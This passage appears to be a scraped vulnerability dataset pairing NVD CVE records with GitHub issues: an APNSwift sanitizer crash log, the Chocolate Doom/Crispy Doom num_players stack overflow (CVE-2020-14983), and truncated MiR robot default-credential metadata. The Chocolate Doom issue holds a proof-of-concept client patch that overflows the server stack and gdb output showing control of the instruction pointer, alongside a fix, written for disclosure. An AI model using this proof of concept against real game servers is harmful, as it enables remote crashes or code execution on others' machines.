(XCTest:x86_64+0xadb53) #46 0x1053350f9 in main (xctest:x86_64+0x1000020f9) #47 0x7fff6693bc48 in start (libdyld.dylib:x86_64+0x11c48) 0x615000013880 is located 0 bytes to the right of 512-byte region [0x615000013680,0x615000013880) allocated by thread T0 here: #0 0x1053a27d3 in wrap_malloc (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x607d3) #1 0x10d96fc06 in closure #1 in ByteBufferAllocator.init() ByteBuffer-core.swift:69 #2 0x10d96fc68 in @objc closure #1 in ByteBufferAllocator.init() <compiler-generated> #3 0x10d975195 in static ByteBuffer._Storage.allocateAndPrepareRawMemory(bytes:allocator:) ByteBuffer-core.swift:226 #4 0x10d977360 in static ByteBuffer._Storage.reallocated(minimumCapacity:allocator:) ByteBuffer-core.swift:266 #5 0x10d971480 in ByteBuffer.init(allocator:startingCapacity:) ByteBuffer-core.swift:407 #6 0x10d9709ba in ByteBufferAllocator.buffer(capacity:) ByteBuffer-core.swift:90 #7 0x10d418aa9 in APNSwiftConfigurationTests.testSignature() APNSwiftConfigurationTests.swift:49 #8 0x10d41b53d in @objc APNSwiftConfigurationTests.testSignature() <compiler-generated> #9 0x7fff2f2225eb in __invoking___ (CoreFoundation:x86_64h+0x4a5eb) #10 0x7fff2f2224a3 in -[NSInvocation invoke] (CoreFoundation:x86_64h+0x4a4a3) #11 0x1060f4c6d in __24-[XCTestCase invokeTest]_block_invoke_2.214 (XCTest:x86_64+0x2dc6d) #12 0x10618113a in -[XCTMemoryChecker _assertInvalidObjectsDeallocatedAfterScope:] (XCTest:x86_64+0xba13a) #13 0x1060ff8da in -[XCTestCase assertInvalidObjectsDeallocatedAfterScope:] (XCTest:x86_64+0x388da) #14 0x1060f4bfd in __24-[XCTestCase invokeTest]_block_invoke.208 (XCTest:x86_64+0x2dbfd) #15 0x10616858f in -[XCTestCase(Failures) performFailableBlock:testCaseRun:shouldInterruptTest:] (XCTest:x86_64+0xa158f) #16 0x1061684ac in -[XCTestCase(Failures) _performTurningExceptionsIntoFailuresInterruptAfterHandling:block:] (XCTest:x86_64+0xa14ac) #17 0x1060f46ae in __24-[XCTestCase invokeTest]_block_invoke (XCTest:x86_64+0x2d6ae) #18 0x1060f41a7 in -[XCTestCase testContextPerformInScope:] (XCTest:x86_64+0x2d1a7) #19 0x1060f4241 in -[XCTestCase invokeTest] (XCTest:x86_64+0x2d241) #20 0x1060f6020 in __26-[XCTestCase performTest:]_block_invoke_2 (XCTest:x86_64+0x2f020) #21 0x10616858f in -[XCTestCase(Failures) performFailableBlock:testCaseRun:shouldInterruptTest:] (XCTest:x86_64+0xa158f) #22 0x1061684ac in -[XCTestCase(Failures) _performTurningExceptionsIntoFailuresInterruptAfterHandling:block:] (XCTest:x86_64+0xa14ac) #23 0x1060f5f37 in __26-[XCTestCase performTest:]_block_invoke.342 (XCTest:x86_64+0x2ef37) #24 0x10617880b in +[XCTContext runInContextForTestCase:block:] (XCTest:x86_64+0xb180b) #25 0x1060f56aa in -[XCTestCase performTest:] (XCTest:x86_64+0x2e6aa) #26 0x106147163 in -[XCTest runTest] (XCTest:x86_64+0x80163) #27 0x1060efd4a in __27-[XCTestSuite performTest:]_block_invoke (XCTest:x86_64+0x28d4a) #28 0x1060ef474 in -[XCTestSuite _performProtectedSectionForTest:testSection:] (XCTest:x86_64+0x28474) #29 0x1060ef771 in -[XCTestSuite performTest:] (XCTest:x86_64+0x28771) SUMMARY: AddressSanitizer: heap-buffer-overflow (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x175ed) in wrap_strlen Shadow bytes around the buggy address: 0x1c2a000026c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x1c2a000026d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1c2a000026e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1c2a000026f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1c2a00002700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x1c2a00002710:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x1c2a00002720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x1c2a00002730: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x1c2a00002740: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x1c2a00002750: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x1c2a00002760: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==41340==ABORTING ``` **To Reproduce** Steps to reproduce the behavior: 1. run tests with `swift test --sanitize=address --disable-index-store` **Expected behavior** passes - OS: macOS Catalina [log_swift_2OMC7b.log](https://github.com/kylebrowning/APNSwift/files/3417487/log_swift_2OMC7b.log)
memory unsafety -- address sanitizer failure
https://api.github.com/repos/swift-server-community/APNSwift/issues/31/comments
0
2019-07-22T13:01:29Z
2019-07-23T17:27:08Z
https://github.com/swift-server-community/APNSwift/issues/31
471,082,442
31
1,306
CVE-2020-14983
2020-06-22T20:15:11.380
The server in Chocolate Doom 3.0.0 and Crispy Doom 5.8.0 doesn't validate the user-controlled num_players value, leading to a buffer overflow. A malicious user can overwrite the server's stack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00002.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00007.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00012.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/chocolate-doom/chocolate-doom/issues/1293" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00002.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00007.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00012.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/chocolate-doom/chocolate-doom/issues/1293" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chocolate-doom:chocolate_doom:3.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "8A0A032A-7DAA-4ECA-AEA1-6A53174ED24C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:chocolate-doom:crispy_doom:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "AF3CE9D2-DCDF-43E5-864E-EFC6C67F8560", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:backports:sle-15:sp1:*:*:*:*:*:*", "matchCriteriaId": "C84D9410-31B7-421A-AD99-8ED2E45A9BC6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "matchCriteriaId": "B009C22E-30A4-4288-BCF6-C3E81DEAF45A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/chocolate-doom/chocolate-doom/issues/1293
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "chocolate-doom", "chocolate-doom" ]
### Background Version of Chocolate Doom: - Chocolate Doom 3.0.0 (from the website) - Chocolate Doom git revision 5bf73c4864fedb6b97b27bf302435a1168ba8f4c - confirmed also in: Crispy Doom 5.8.0 Operating System and version: Ubuntu 18.04 x86-64 Compilation: `CFLAGS="-fsanitize=address -ggdb -O0" LDFLAGS="-fsanitize=address" ./configure --prefix=`pwd`/bin` Game: (Doom/Heretic/Hexen/Strife/other) FreeDM ### Bug description When the client starts the game, it sends its settings using the `NET_WriteSettings` function. The server receives and parses it in the `NET_ReadSettings` function. The settings packet consist of the `num_players` integer. This value is used as an maximum value while iterating over corresponding settings and writing them to the `player_classes` fixed sized (8 elements) array. ``` File: src/net_structrw.c 091: boolean NET_ReadSettings(net_packet_t *packet, net_gamesettings_t *settings) 092: { 093: boolean success; 094: int i; 095: 096: success = NET_ReadInt8(packet, (unsigned int *) &settings->ticdup) (...) 111: && NET_ReadInt8(packet, (unsigned int *) &settings->num_players) (...) 119: for (i = 0; i < settings->num_players; ++i) 120: { 121: if (!NET_ReadInt8(packet, 122: (unsigned int *) &settings->player_classes[i])) 123: { 124: return false; 125: } 126: } 127: 128: return true; 129: } ``` ``` File: src/net_defs.h 37: #define NET_MAXPLAYERS 8 [...] 186: typedef struct 187: { [...] 211: 212: int player_classes[NET_MAXPLAYERS]; 213: 214: } net_gamesettings_t; ``` The client can send any byte value and fill the packet with additional bytes to write outside the array and cause stack-based buffer overflow. PoC: Modified client's code: ``` --- a/src/net_structrw-b.c +++ b/src/net_structrw.c @@ -79,13 +79,16 @@ void NET_WriteSettings(net_packet_t *packet, net_gamesettings_t *settings) NET_WriteInt32(packet, settings->timelimit); NET_WriteInt8(packet, settings->loadgame); NET_WriteInt8(packet, settings->random); - NET_WriteInt8(packet, settings->num_players); + NET_WriteInt8(packet, settings->num_players+100); NET_WriteInt8(packet, settings->consoleplayer); for (i = 0; i < settings->num_players; ++i) { NET_WriteInt8(packet, settings->player_classes[i]); } + for (i = 0; i < 100; i++) { + NET_WriteInt8(packet, 0xaa); + } } ``` When all of the clients are connected and the owner starts the game, the server crashes. ``` ./chocolate-server ./chocolate-doom -iwad ~/freedm.wad -window -nomouse -connect 127.0.0.1 -nodes 1 ``` Chocolate Doom ASAN: ``` ==22788==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff357bea94 at pc 0x560b7e6bfb06 bp 0x7fff357be9a0 sp 0x7fff357be990 WRITE of size 4 at 0x7fff357bea94 thread T0 #0 0x560b7e6bfb05 in NET_ReadInt8 /home/mmm/projects/chocolate-doom-3.0.0/src/net_packet.c:78 #1 0x560b7e6cb992 in NET_ReadSettings /home/mmm/projects/chocolate-doom-3.0.0/src/net_structrw.c:121 #2 0x560b7e6c7656 in NET_SV_ParseGameStart /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:921 #3 0x560b7e6c91c3 in NET_SV_Packet /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:1408 #4 0x560b7e6ca87f in NET_SV_Run /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:1813 #5 0x560b7e6bf102 in NET_DedicatedServer /home/mmm/projects/chocolate-doom-3.0.0/src/net_dedicated.c:74 #6 0x560b7e6bcf4e in D_DoomMain /home/mmm/projects/chocolate-doom-3.0.0/src/d_dedicated.c:45 #7 0x560b7e6ba254 in main /home/mmm/projects/chocolate-doom-3.0.0/src/i_main.c:48 #8 0x7f1b68c4fb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x560b7e6ba0e9 in _start (/home/mmm/projects/chocolate-doom-3.0.0/bin-asan/bin/chocolate-server+0x60e9) Address 0x7fff357bea94 is located in stack of thread T0 at offset 132 in frame #0 0x560b7e6c758a in NET_SV_ParseGameStart /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:909 This frame has 1 object(s): [32, 132) 'settings' <== Memory access at offset 132 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/mmm/projects/chocolate-doom-3.0.0/src/net_packet.c:78 in NET_ReadInt8 Shadow bytes around the buggy address: 0x100066aefd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100066aefd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100066aefd20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100066aefd30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100066aefd40: 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 =>0x100066aefd50: 00 00[04]f2 f2 f2 00 00 00 00 00 00 00 00 00 00 0x100066aefd60: 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 00 00 00 00 0x100066aefd70: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 0x100066aefd80: f2 f2 f2 f2 00 f2 f2 f2 00 00 00 00 00 00 00 00 0x100066aefd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100066aefda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==22788==ABORTING ``` Chocolate Doom without asan: ``` $ bin-clean/bin/chocolate-server Chocolate Doom standalone dedicated server zone memory: Using native C allocator. Warning: Failed to resolve address for master server: master.chocolate-doom.org:2342 *** stack smashing detected ***: <unknown> terminated Aborted ``` Chocolate Doom without stack protection: ``` $ gdb bin-clean/bin/chocolate-server GNU gdb (Ubuntu 8.1-0ubuntu3.2) 8.1.0.20180409-git Copyright (C) 2018 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from bin-clean/bin/chocolate-server...done. (gdb) r Starting program: /home/mmm/projects/chocolate-doom-3.0.0/bin-clean/bin/chocolate-server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Chocolate Doom standalone dedicated server zone memory: Using native C allocator. Warning: Failed to resolve address for master server: master.chocolate-doom.org:2342 Program received signal SIGSEGV, Segmentation fault. 0x000000aa000000aa in ?? () (gdb) i r rax 0x5555557682a0 93824994411168 rbx 0xaa000000aa 730144440490 rcx 0x5555557601c0 93824994378176 rdx 0x0 0 rsi 0xffffffff 4294967295 rdi 0x7ffff7ff8170 140737354105200 rbp 0xaa000000aa 0xaa000000aa rsp 0x7fffffffdee0 0x7fffffffdee0 r8 0xa84 2692 r9 0x7fffffffdd20 140737488346400 r10 0x7fffffffdce0 140737488346336 r11 0x246 582 r12 0xaa000000aa 730144440490 r13 0xaa000000aa 730144440490 r14 0xaa000000aa 730144440490 r15 0xaa000000aa 730144440490 rip 0xaa000000aa 0xaa000000aa eflags 0x10202 [ IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) i stack #0 0x000000aa000000aa in ?? () #1 0x000000aa000000aa in ?? () #2 0x000000aa000000aa in ?? () #3 0x000000aa000000aa in ?? () #4 0x000000aa000000aa in ?? () #5 0x000000aa000000aa in ?? () #6 0x000000aa000000aa in ?? () #7 0x000000aa000000aa in ?? () #8 0x000000aa000000aa in ?? () #9 0x000000aa000000aa in ?? () #10 0x000000aa000000aa in ?? () #11 0x000000aa000000aa in ?? () #12 0x000000aa000000aa in ?? () #13 0x000000aa000000aa in ?? () #14 0x000000aa000000aa in ?? () #15 0x000000aa000000aa in ?? () #16 0x000000aa000000aa in ?? () #17 0x000000aa000000aa in ?? () #18 0x000000aa000000aa in ?? () #19 0x000000aa000000aa in ?? () #20 0x000000aa000000aa in ?? () #21 0x000000aa000000aa in ?? () #22 0x000000aa000000aa in ?? () #23 0x000000aa000000aa in ?? () #24 0x000000aa000000aa in ?? () #25 0x000000aa000000aa in ?? () #26 0x00007ffff4dcabb0 in __pthread_init_array () from /lib/x86_64-linux-gnu/libpthread.so.0 #27 0x0000000000000000 in ?? () ``` Crispy Doom ASAN ``` ./chocolate-doom -iwad ~/freedm.wad -window -nomouse -connect 127.0.0.1 -nodes 1 ./crispy-server ``` ``` ================================================================= ==13660==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc0a90d2d4 at pc 0x55f3703f1acc bp 0x7ffc0a90d1e0 sp 0x7ffc0a90d1d0 WRITE of size 4 at 0x7ffc0a90d2d4 thread T0 #0 0x55f3703f1acb in NET_ReadInt8 /home/mmm/projects/crispy-doom/src/net_packet.c:78 #1 0x55f3703fecca in NET_ReadSettings /home/mmm/projects/crispy-doom/src/net_structrw.c:121 #2 0x55f3703f9d11 in NET_SV_ParseGameStart /home/mmm/projects/crispy-doom/src/net_server.c:972 #3 0x55f3703fc17b in NET_SV_Packet /home/mmm/projects/crispy-doom/src/net_server.c:1535 #4 0x55f3703fdb8d in NET_SV_Run /home/mmm/projects/crispy-doom/src/net_server.c:1946 #5 0x55f3703f0fd0 in NET_DedicatedServer /home/mmm/projects/crispy-doom/src/net_dedicated.c:75 #6 0x55f3703ea30e in D_DoomMain /home/mmm/projects/crispy-doom/src/d_dedicated.c:45 #7 0x55f3703e73a2 in main /home/mmm/projects/crispy-doom/src/i_main.c:78 #8 0x7f1a51de3b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55f3703e6eb9 in _start (/home/mmm/projects/crispy-doom/bin-asan/bin/crispy-server+0x10eb9) Address 0x7ffc0a90d2d4 is located in stack of thread T0 at offset 132 in frame #0 0x55f3703f9c1b in NET_SV_ParseGameStart /home/mmm/projects/crispy-doom/src/net_server.c:956 This frame has 1 object(s): [32, 132) 'settings' <== Memory access at offset 132 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/mmm/projects/crispy-doom/src/net_packet.c:78 in NET_ReadInt8 Shadow bytes around the buggy address: 0x100001519a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100001519a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100001519a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100001519a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100001519a40: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 =>0x100001519a50: 00 00 00 00 00 00 00 00 00 00[04]f2 f2 f2 00 00 0x100001519a60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x100001519a70: 04 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 0x100001519a80: 00 00 f1 f1 f1 f1 00 f2 f2 f2 f2 f2 f2 f2 00 f2 0x100001519a90: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100001519aa0: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f2 f2 f2 f2 f8 f8 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==13660==ABORTING ``` ### Fix proposition ``` diff --git a/src/net_structrw.c b/../chocolate-doom/src/net_structrw.c index 2dbd274..437bc71 100644 --- a/src/net_structrw.c +++ b/../chocolate-doom/src/net_structrw.c @@ -116,7 +116,7 @@ boolean NET_ReadSettings(net_packet_t *packet, net_gamesettings_t *settings) return false; } - for (i = 0; i < settings->num_players; ++i) + for (i = 0; i < settings->num_players && i < NET_MAXPLAYERS; ++i) { if (!NET_ReadInt8(packet, (unsigned int *) &settings->player_classes[i])) ``` found by Michał Dardas from LogicalTrust
Missing server-side num_players validation leading to buffer overflow
https://api.github.com/repos/chocolate-doom/chocolate-doom/issues/1293/comments
13
2020-06-22T16:20:12Z
2020-07-01T15:42:53Z
https://github.com/chocolate-doom/chocolate-doom/issues/1293
643,203,302
1,293
1,307
CVE-2020-10269
2020-06-24T05:15:12.647
One of the wireless interfaces within MiR100, MiR200 and possibly (according to the vendor) other MiR fleet vehicles comes pre-configured in WiFi Master (Access Point) mode. Credentials to such wireless Access Point default to well known and widely spread SSID (MiR_RXXXX) and passwords (omitted). This information is also available in past User Guides and manuals which the vendor distributed. We have confirmed this flaw in MiR100 and MiR200 but it might also apply to MiR250, MiR500 and MiR1000.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2566" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2566" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBDEDA2D-26AB-4F23-B672-D0C89A7BEFB9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0989373-02AB-4E05-BAC2-0522A641D73A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "78E261B1-C56F-4428-9D53-5BBCCACEAFCF", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "7BF40B1F-0DD2-4B8A-BFBA-A7E641DC3316", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir250_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "877EEDC4-E86F-420D-81C6-3F632C787003", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1AE2A0-D83D-441B-856B-7E6FAB065C0D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "335CA5FE-5AFD-4D49-9A88-1CD71C9281BE", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "F57611E0-5CB2-40FD-8420-ED13A1C4863F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir1000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "6865A559-8CA9-4F51-AC43-35BDF5201B91", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "04043B16-E401-4D2C-9812-71923CEA2716", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robotics:er200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "39BD42AA-95E1-4A02-BB9D-C54AE6BAF9B2", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "D8A47E5E-7754-47EA-B02D-8A7F54124ED4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, 